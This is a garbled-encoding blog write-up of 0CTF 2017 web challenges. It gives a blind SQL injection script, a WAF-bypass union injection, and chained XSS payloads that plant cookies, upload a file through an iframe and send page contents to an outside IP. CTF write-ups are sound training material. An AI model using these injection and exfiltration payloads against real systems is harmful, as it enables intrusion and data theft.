LoRexxar's Blog

0ctf201 web閮ㄥ垎writeup

2017/03/21

绾康涓嬪伔鍋风櫥涓婅悓鏂版绗竴鐨勬瘮璧涳紝涔熷疄鐜颁簡姣旇禌鍓嶇殑鎰挎湜锛0ctf浜夊彇涓0鍒嗭紝rsctf浜夊彇楂樺悕娆★紝:>

image_1bbm7t6mv1lckjf7m4o10tq1s81g.png-31.5kB
image_1bbm7tqmjkb011vho2e19mg1j7mt.png-4.2kB
image_1bbm7umpc158d118d1elc3i71j6g1a.png-24.2kB

Temmo鈥檚 Tiny Shop

棰樼洰鏄釜绫讳技浜庡皬鍗栭摵鐨勭珯锛屾渶鏈夎叮鐨勬槸鍒氬紑濮嬬殑鏃跺欙紝杩欓杩涘幓鏄挶寰堝鐨勶紝鍙互闅忎究涔帮紝涔熷彲浠ョ湅鍒癶int

1
OK! Now I will give some hint: you can get flag by use `select flag from b7d8769d64997e392747dbad9cd450c4`

鍚庢潵绐佺劧棰樼洰灏辨敼浜嗭紝鍙湁4000鍧椾簡锛屼拱涓嶄簡hint锛屽緢姘斺(鐪嬪埆浜虹殑wp鍚admin鏄急鍙d护杩樻槸浠涔堢殑锛岄噷闈竴鐧惧涓囧彲浠ラ殢渚夸拱鈥

閫涢涙暣涓珯锛屾湁涓嬮潰鍑犱釜淇℃伅锛

1銆佺櫥褰曚笂鍘诲悗锛屽彲浠ヨ喘涔颁笢瑗匡紝璐拱涓滆タ鍙互閫璐э紝杩欎釜杩囩▼鏄笉闇瑕侀獙璇佸晩浠涔堢殑锛屼絾鏄笉瀛樺湪绔炰簤銆

2銆佽喘涔伴璐ц繖閲岀殑閫昏緫閲屾湁涓猧d锛屼絾鏄庝箞娴嬭瘯閮戒笉瀵癸紝鍙兘鏄湁intval鍚

3銆乤ction鏄櫧鍚嶅崟锛屽彧瑕佷笉鏄渶瑕佺殑閭e嚑涓氨浼氱洿鎺ユ嫤鎴紝order鏄粦鍚嶅崟

4銆佷笉瀛樺湪鑳借鐩叉祴鍑烘潵鐨勪簩娆℃敞鍏

閭d箞闂寰堟竻鏅颁簡锛宱rderby鏄渶鍙兘瀛樺湪娉ㄥ叆鐨勫湴鏂癸紝浣嗘槸姣旇緝鏃犳儏鐨勬槸杩欓噷waf闈炲父鐨勮糠锛岃屼笖杩樻湁闀垮害鐨勯檺鍒讹紝铏界劧鎴戞病韪╄繖涓潙锛屼絾鏄垜瑙夊緱娌℃嬁鍒癶int搴旇鏄敞涓嶄簡鐨勶紙闀垮害涓嶅锛

order 鐧藉悕鍗曢粦鍚嶅崟閮芥湁锛屽ソ鍍忓氨\w鍙互銆傜壒娈婄鍙疯窡涓枃绗﹀彿涔熶笉琛屻傝繕鏈夊user,database鍏抽敭璇嶇殑妫娴嬨傜櫧鍚嶅崟:&,()0-9a-Z

浣嗘槸鍙互閫氳繃left鏉ヨ繘琛宭ike鐩叉敞锛屾潯浠剁鍚堝氨鎸夌収name鎺掑垪锛屼笉绗﹀悎灏辨寜price鎺掑垪锛堜綘闇瑕佷拱2涓笉鍚岀殑涓滆タ锛

鏈変釜鍏抽敭鐐逛簨鍏充簬鐩叉敞鐨勶紝鍥犱负order杩欓噷鏄湁闀垮害闄愬埗鐨勶紝闀垮害鍙堜笉澶熸垜浠姞鍑芥暟鏉ユ埅鏂紝鎵浠ュ彧鑳界敤%鍋氶氶厤绗︽潵璺戞渶鍚庝竴浣嶏紝鑴氭湰濡備笅

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests
import threading
import time
from random import Random
url = "http://202.120.7.197/"
cookie = {'PHPSESSID': 'qlqmjbq7uglcr0onm1lmm4ndg4'}
r=requests.get(url+'app.php?action=search&keyword=&order=if((select(left((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),3))like(0x2562)),name,price)', cookies=cookie)
err = r.text
s = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;<=>?@[\\]^`{|}~\'"_%'
def check(payload):
cookie = {'PHPSESSID': 'qlqmjbq7uglcr0onm1lmm4ndg4'}
r=requests.get(url+'app.php?action=search&keyword=&order='+payload, cookies=cookie)
return r.text
flag = ""
for m in range(1,35):
for i in s:
payload = "if((select(left((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),%s))like(0x25%s)),name,price)" % (str(m), hex(ord(i))[2:])
if check(payload) != err:
flag +=i
print flag
break

KoG

杩欓鍏跺疄璇磋捣鏉ユ尯闅惧緱锛屼笉鏄痡s鑰佸徃鏈烘牴鏈皟涓嶅嚭鏉ワ紝鎵撳紑棰樼洰灏辫兘鐪嬪嚭鏉ヤ簡锛岄〉闈腑鏄氳繃id鏉ヨ绠楀搷搴旂殑hash鐒跺悗璇锋眰鏈嶅姟鍣紝鐒跺悗id杩欓噷鏄湁鍒ゆ柇鐨勶紝濡傛灉琚嫤浜嗗氨浼氳繑鍥 wrongboy锛屼负浜嗚兘寰楀埌鎯宠鐨勫瓧绗︿覆锛屾垜闇瑕佷笅鏂偣鎶婂嚑涓垽鏂烦杩囥

瑕佺煡閬撴湁鍙ヨ瘽璇村緱濂斤紝js娣锋穯姘歌繙鏄焊绯婄殑銆

涓嬫柇鐐硅窡韪垽鏂紝鍚堝苟鍙戠幇鏇存敼鏌愬嚑涓彉閲忎负true/false鍙互寰楀埌瀛楃涓插弬鏁扮殑姝g‘hash鍊硷紝
鎶婅剼鏈繚瀛樺埌鏈湴鑷繁鏇存敼锛岃竟璺熻竟鍒犻櫎鎺変竴浜涢昏緫鏈鍚庡彂鐜版渶鏈川鐨勮В娉曟槸鎶婃墍鏈夌殑

绫讳技

1
2
($33<<24>>24)>(47);
($36<<24>>24)<(58)

鍒ゆ柇涓涓寖鍥村湪 47 58 涔嬮棿鐨勯兘杩涜鏇存敼锛堟湁澶氬锛屼絾鏈変簺鏄病鐢ㄧ殑锛夈 ($n<<24>>24)==(0) 鐨勪笉闇瑕佺瀹

1
2
($鍙橀噺<<24>>24)>(0);
($鍙橀噺<<24>>24)<(128);

鐒跺悗鍦ㄦ湰鍦版祴璇曢氳繃銆傚悗闈㈠氨鏄渶鏈鏅氱殑娉ㄥ叆浜嗭紝涓嶅璇翠簡銆

simplesqlin

棰樼洰鍏跺疄璇磋捣鏉ユ尯绠鍗曠殑锛屼絾鏄嵈鏄釜涓嶅父鐢ㄧ殑榛戦瓟娉曪紝娉ㄥ叆鐐瑰氨鎽嗗湪闈㈠墠锛岀湅涓婂幓濂藉儚涓鍒囬兘娌℃湁杩囨护锛屼絾鏄簨瀹炰笂涓昏鐨勫嚑涓鍙ラ兘琚嫤浜嗭紝涓涓猻elect琚共浜嗗氨宸茬粡娌′粈涔堝姙娉曚簡锛屽綋鍓嶈〃涔熸病浠涔堜笢瑗裤

铏界劧涓嶇煡閬撻粦榄旀硶鏄粈涔堝湴鏂规渶鏃╃垎鍑烘潵鐨勶紝浣嗘垜鐪嬬殑鏄繖绡囨枃绔

https://www.exploit-db.com/papers/17934/

鍦╯elect鐨勪腑闂村姞鍏ョ被浼间簬%00杩欐牱鐨勫氨浼氱粫杩噖af锛屾病浠旂粏娴嬭瘯锛屽熀鏈笂%0鍑犻兘鍙互銆

1
2
3
payload
http://202.120.7.203/index.php?id=5 union sele%0bct 1,(selec%00t flag fro%00m flag limit 0,1),3%23

澶嶆潅xss

鎴戞劅瑙夊緢妫掔殑涓棰橈紝涓嬮潰鎴戠◢寰浠旂粏涓鐐瑰効銆

绗竴涓〉闈rl鏄http://government.vip/

image_1bbm81fi31ic413d1vkjuad4q1n.png-42.1kB

鐒跺悗flag鏄湪http://admin.government.vip:8000鍙︿竴涓煙涓

绗竴閮ㄥ垎杩欓噷payload鏄病鍋氫换浣曢檺鍒剁殑锛屼綘鍙互闅忎究鏋勯犱竴涓猧mg鏍囩鐒跺悗鐩戝惉杩囧幓鐪嬬湅锛岃繖閲屾槸鍙互鎵ц浠绘剰js鐨勩

鐒跺悗鎴戜滑鐩存帴鎵撳紑http://admin.government.vip:8000鐪嬬湅锛屾湁涓櫥褰曟锛宼est test鍙互鐧诲綍鎴愬姛锛屼粩缁嗚瀵熺珯鍐咃紝鎴戜滑寰楀埌杩欐牱涓涓俊鎭

image_1bbm867761jslt3s60i1punqj324.png-59.2kB

椤甸潰鍐呯殑username鏄粠cookie閲岃幏鍙栫殑锛岃屼笖username杩欎釜cookie涓嶆槸httponly锛岄氳繃璁剧疆cookie锛屾垜浠彲浠ユ瀯閫爔ss锛屾墽琛屼换鎰廽s锛屼絾椤甸潰鏈夋矙绠辩鐢ㄤ簡閮ㄥ垎鍑芥暟銆

涔嬪悗鎴戜滑杩樼湅鍒伴鐩粰浜嗘彁绀鸿鍙湁admin鍙互upload shell锛岃闂笅upload鐪嬬湅锛岄〉闈㈠瓨鍦紝get璇锋眰浼405锛屽彧鑳藉彂閫乸ost璇锋眰銆

绋嶅井鏁寸悊涓嬪凡鏈夌殑鏉′欢锛

1銆乽rl1鏄暣绔欑殑鏍圭洰褰曪紝鍙互鎵ц浠绘剰js

2銆乽rl2鏄暣绔欑殑瀛愬煙锛岄氳繃璁剧疆cookie鍙互鎵цjs

3銆佹垜浠殑鐩爣鏄湪admin涓婁笂浼犳枃浠讹紝杩樿鑾峰彇鍒拌繑鍥炲洖鏉

浣犲彲鑳借寰楃幇鍦ㄧ殑鏉′欢骞朵笉澶燂紝鍥犱负浣犲彲鑳戒笉鐭ラ亾cookie鐨勭壒鎬с

image_1bbnj20hv1tirtiq1ec7vrc2k22h.png-113.9kB

棣栧厛js鏄彲浠ヨ缃甤ookie鐨

浣嗘槸鍦╳eb鍐呮湁涓緢澶氫汉閮界煡閬撶殑鐨勯棶棰橈紝灏辨槸鍚屾簮绛栫暐

image_1bbnj670k1kjd1fih1khj1oegq6n2u.png-340.6kB

浣哻ookie涓紝鍙堟湁鐐瑰効涓嶄竴鏍

image_1bbnj81aj1i95ua2ea91c3s5rq3b.png-403.3kB

cookie鏄笉鍖哄垎绔彛浠ュ強http/https鐨勶紝鑰屽浜巇omain鏄悜涓婂尮閰嶇殑锛屽啀鏉ョ湅涓緥瀛

image_1bbnjg0gu18an1nn2dhm7bd1b4h3o.png-900.4kB

涔熷氨鏄鎴戜滑鍦ㄦ牴鍩熸槸鍙互璁剧疆瀛愬煙鐨刢ookie鐨勩

鎵浠ョ涓閮ㄥ垎鐨刾ayload灏辨槸

1
2
3
4
5
<script>
document.cookie="username=a<script>window.location.href='http://115.28.78.16?id=test'<\/script>;domain=.government.vip; path=/;"
window.location.href="http://admin.government.vip:8000";
</script>

鐜板湪闂鏉ヤ簡锛屾垜浠氳繃鍐檍s鏉ヨ鍙杣pload鐨勫唴瀹癸紝杩欓噷鎴戞祴璇曟槸杩斿洖405鐨勶紝鐪嬪皬m鐨剋p杩欓噷浠栨槸璇诲埌浜嗗唴瀹广傘傛垜涔熶笉鏄緢鎳

杩欓噷閬囧埌浜嗘柊鐨勯毦棰橈紝娌欑

1
2
3
4
5
6
7
8
9
10
<script>
//sandbox
delete window.Function;
delete window.eval;
delete window.alert;
delete window.XMLHttpRequest;
delete window.Proxy;
delete window.Image;
delete window.postMessage;
</script>

鍙嶆鎴戞槸娌″姙娉曞湪娌欑鎯呭喌涓嬭姹傚埌upload鐨勫唴瀹癸紝杩欓噷鎴戦夋嫨寮曞叆iframe鏍囩锛岀劧鍚庤鍙杋frame鐨勫唴瀹瑰彂閫佸洖鏉ャ

payload

1
2
3
4
5
<script>
document.cookie="username=aa<iframe id='test' src='upload'></iframe><script>window.location.href='http://115.28.78.16?id='+encodeURIComponent(document.getElementById('test').contentWindow.document.documentElement.outerHTML)<\/script>;domain=.government.vip; path=/;"
window.location.href="http://admin.government.vip:8000";
</script>

绱ф帴鐫鎴戝彂鐜帮紝upload椤甸潰鏄病鏈夋矙绠辩殑锛屾垜浠氳繃鍚慽frame涓啓鍏s鎵ц灏卞彲浠ュ仛鎴戜滑鎯冲仛鐨勪簨鎯呬簡

1
2
3
4
5
<script>
document.cookie="username=aa</iframe><script>var iframe = document.createElement('iframe')<\/script><script>iframe.id = 'ddog'<\/script><script>iframe.name = 'iframe1'<\/script><script>iframe.src='upload'<\/script><script>document.body.appendChild(iframe)<\/script><script>var content=\"<script>var xhr = new XMLHttpRequest()<\\/script><script>xhr.open('POST', 'upload', false)<\\/script><script>xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')<\\/script><script>xhr.send('file=a')<\\/script><script>var mess = xhr.response<\\/script><script>document.write(encodeURIComponent(mess))<\\/script>\"<\/script><script>setTimeout(\"iframe.contentWindow.document.write(content)\", 3000)<\/script><script>document.body.appendChild(iframe)<\/script><script>window.onload = setTimeout(\"window.location.href='http://115.28.78.16?id='+encodeURIComponent(document.getElementById('ddog').contentWindow.document.documentElement.outerHTML)\",3000)<\/script>;domain=.government.vip; path=/;"
window.location.href="http://admin.government.vip:8000";
</script>

杩欎釜搴旇鏄病鍒殑鍔炴硶浜嗭紝鏈変釜鍏抽敭鐨勯棶棰樻槸鍚屾簮绛栫暐锛屽彧鏈夋垜浠湪iframe鍐呭紩鍏ヤ簡鏈煙鐨勯〉闈紝鐒跺悗鍚憉pload鍙戦亁hr璇锋眰锛屾墠鏄湁鏁堢殑锛屼笉鐒朵細琚悓婧愮瓥鐣ユ嫤鎴紝鎺ヤ笅鏉ユ垜浠渶瑕佹瀯閫犱竴涓笂浼犳枃浠剁殑js锛岃繖閲屽彲浠ョ洿鎺ュ幓burp鎵掍竴涓笅鏉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "upload.php", false);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------12264101169922");
xhr.withCredentials = true;
var body = "-----------------------------12264101169922\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"shell\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"shell\r\n" +
"-----------------------------12264101169922\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"\xcc\xe1\xbd\xbb\xb2\xe9\xd1\xaf\r\n" +
"-----------------------------12264101169922--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
alert(xhr.response)
}
submitRequest()
</script>

鐢变簬浠g爜閲屾湁澶鐨勫垎鍙凤紝鑰宑ookie涓垎鍙锋槸鍖哄埆瀛楁鐨勶紝杩欓噷蹇呴』瑕乽rlencode锛岃屼笖杩橀渶瑕佷笓闂ㄥ涓鍙ュ啓鍏ラ〉闈紝鏈缁坧ayload濡備笅

1
2
3
4
5
<script>
document.cookie="username=aa</iframe><script>var iframe = document.createElement('iframe')<\/script><script>iframe.id = 'ddog'<\/script><script>iframe.name = 'iframe1'<\/script><script>iframe.src='upload'<\/script><script>document.body.appendChild(iframe)<\/script><script>var content=\"<script>document.write(decodeURIComponent('%3Cscript%3E%0Afunction%20submitRequest%28%29%0A%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%0A%20%20%20%20%20%20%20%20xhr.open%28%22POST%22%2C%20%22upload%22%2C%20false%29%3B%0A%20%20%20%20%20%20%20%20xhr.setRequestHeader%28%22Accept%22%2C%20%22text%2fhtml%2Capplication%2fxhtml%2bxml%2Capplication%2fxml%3Bq%3D0.9%2C%2a%2f%2a%3Bq%3D0.8%22%29%3B%0A%20%20%20%20%20%20%20%20xhr.setRequestHeader%28%22Accept-Language%22%2C%20%22zh-CN%2Czh%3Bq%3D0.8%2Cen-US%3Bq%3D0.5%2Cen%3Bq%3D0.3%22%29%3B%0A%20%20%20%20%20%20%20%20xhr.setRequestHeader%28%22Content-Type%22%2C%20%22multipart%2fform-data%3B%20boundary%3D---------------------------12264101169922%22%29%3B%0A%20%20%20%20%20%20%20%20xhr.withCredentials%20%3D%20true%3B%0A%20%20%20%20%20%20%20%20var%20body%20%3D%20%22-----------------------------12264101169922%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22Content-Disposition%3A%20form-data%3B%20name%3D%5C%22file%5C%22%3B%20filename%3D%5C%22shell%5C%22%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22Content-Type%3A%20text%2fplain%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22shell%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22-----------------------------12264101169922%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22Content-Disposition%3A%20form-data%3B%20name%3D%5C%22submit%5C%22%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22%5Cxcc%5Cxe1%5Cxbd%5Cxbb%5Cxb2%5Cxe9%5Cxd1%5Cxaf%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22-----------------------------12264101169922--%5Cr%5Cn%22%3B%0A%20%20%20%20%20%20%20%20var%20aBody%20%3D%20new%20Uint8Array%28body.length%29%3B%0A%20%20%20%20%20%20%20%20for%20%28var%20i%20%3D%200%3B%20i%20%3C%20aBody.length%3B%20i%2b%2b%29%0A%20%20%20%20%20%20%20%20%20%20aBody%5Bi%5D%20%3D%20body.charCodeAt%28i%29%3B%20%0A%20%20%20%20%20%20%20%20xhr.send%28new%20Blob%28%5BaBody%5D%29%29%3B%0A%20%20%20%20%20%20%20%20document.write%28encodeURIComponent%28xhr.response%29%29%0A%20%20%20%20%20%20%7D%0A%0AsubmitRequest%28%29%0A%3C%2fscript%3E'))<\\/script>\"<\/script><script>setTimeout(\"iframe.contentWindow.document.write(content)\", 3000)<\/script><script>document.body.appendChild(iframe)<\/script><script>window.onload = setTimeout(\"window.location.href='http://115.28.78.16?id='+encodeURIComponent(document.getElementById('ddog').contentWindow.document.documentElement.outerHTML)\",3000)<\/script>;domain=.government.vip; path=/;"
window.location.href="http://admin.government.vip:8000";
</script>

get flag

simplexss

杩欎釜棰樼洰璇村疄璇濇湁鐐瑰効闅剧殑锛屾渶鍚庢槸琚玾indow鐨勪竴涓壒鎬у潙锛寃af杩囨护绋嶅井鏈夌偣鍎胯繃鍒嗭紝fuzz涓鍙戯紝鍙樉瀛楃鍙墿涓

1
*+-<=\^_|~

鏃犳剰涓祴璇曞嚭鏉\\1931235898鈥>瀵瑰簲鐨刬p

image_1bbnm3785lrg1k0pe0iu4b8ij45.png-49.3kB

浣唖cript涓嶄細鎵ц锛屽洜涓簊cript娌″姙娉曢棴鍚堬紝鎵浠ュ彧鑳芥兂鍒殑鍔炴硶

杩欓噷鎯冲埌鐨勮В鍐冲姙娉曟槸link鐨刬mport灞炴э紝鏄痟5鏂版彁鍑烘潵鐨勭壒鎬э紝鐢ㄦ潵鍔犺浇妯℃澘锛屾垜浠彲浠ラ氳繃鎻掑叆link鏍囩杩滅▼import鎴戠殑椤甸潰锛屾墽琛宩s銆

璺ㄥ煙鐨勯棶棰樺緢濂借В鍐筹紝鍙鍦ㄨ嚜宸辩殑鏈嶅姟鍣ㄨ缃紝鍝嶅簲澶翠负

1
access-control-allow-origin: *

杩欓噷鏈変釜澶у潙锛屽湪windows涓//鏄湁鐗规畩鎰忎箟鐨勶紝浼氳瑙f瀽涓file://锛岃屽湪firefox鍜岄潪windows涓嬬殑chrome锛岃繖閲屼細琚В鏋愪负鍜屼富绔欑浉鍚岀殑鍗忚锛屼篃灏辨槸https鍗忚.

浜嬪疄涓婏紝鍚庡彴鏄痬ac鈥﹀ソ鍍忔槸涓湡鐨勭數鑴戔︿篃灏辨槸璇达紝濡傛灉鏄嚜绛惧悕璇佷功锛屾祻瑙堝櫒浼氱洿鎺ユ嫤鎴紝鑰宨p鏄笉鑳借棰佸彂璇佷功鐨勩

鎵浠ユ垜浠繀椤荤粫杩囩偣鐨勯檺鍒讹紝寮曞叆涓涓猦ttps绔欎笅鐨勮祫婧愶紝杩欓噷鍙互鐢ㄤ腑鏂囩殑鍙ュ彿

鏈缁坧ayload涓

1
<link rel=import hred=\\xss銆lt

鎵цjs璇诲彇flag.php灏卞ソ浜

CATALOG
  1. 1. Temmo鈥檚 Tiny Shop
  2. 2. KoG
  3. 3. simplesqlin
  4. 4. 澶嶆潅xss
  5. 5. simplexss